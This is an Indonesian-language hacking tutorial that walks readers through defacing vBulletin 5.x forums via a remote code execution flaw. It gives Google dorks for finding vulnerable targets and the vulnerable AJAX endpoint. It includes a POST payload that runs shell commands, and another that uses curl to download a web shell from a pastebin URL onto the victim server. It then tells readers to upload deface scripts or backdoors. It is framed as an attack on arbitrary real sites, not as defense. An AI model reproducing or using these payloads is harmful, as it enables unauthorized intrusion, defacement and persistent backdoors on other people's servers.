Haloo Exploiters !! kali ini saya akan membagikan tutorial Defaceing Metode Vbulletin Remote Code Execution Versi 5.x.x dengan menggunakan post data. ok langsung saja
#Google Dork :
- "Powered By Vbulletin"+"Version 5.5.4"
- "Powered By Vbulletin"+"Version 5.4.5"
Selebihnya gunakan otak kalian
OK kalian dorking dulu, saya anggap kalian telah dapat targetnya. cara mengecek vuln atau tidak dengan menambahkan /ajax/render/widget_php di depan domain. contoh : target.com/ajax/render/widget_php lihat gambar dibawah
setelah itu aktifkan post datanya.. ( jika kalian user android bisa menggunakan aplikasi anon hackbar / Android Hackbar ) masukkan command rcenya ( widgetConfig[code]=echo shell_exec('id'); exit; ), jika ada respon dari commandnya berarti web tersebut vuln, lihat gambar dibawah
langsung saja upload shell : widgetConfig[code]=echo shell_exec('curl https://pastebin.com/raw/4VcQuc55 -o exploit.php'); exit;
webnya blank ? kemungkinan terupload shellnya
akses shellnya target.com/forum/exploit.php atau target.com /exploit.php atau target.com /forums/exploit.php
dan upload script deface atau shell backdoor kalian, disini saya hanya nitip saja
OK semoga artikel ini bermanfaat bagi kalian. jangan lupa untuk share ke teman2 kalian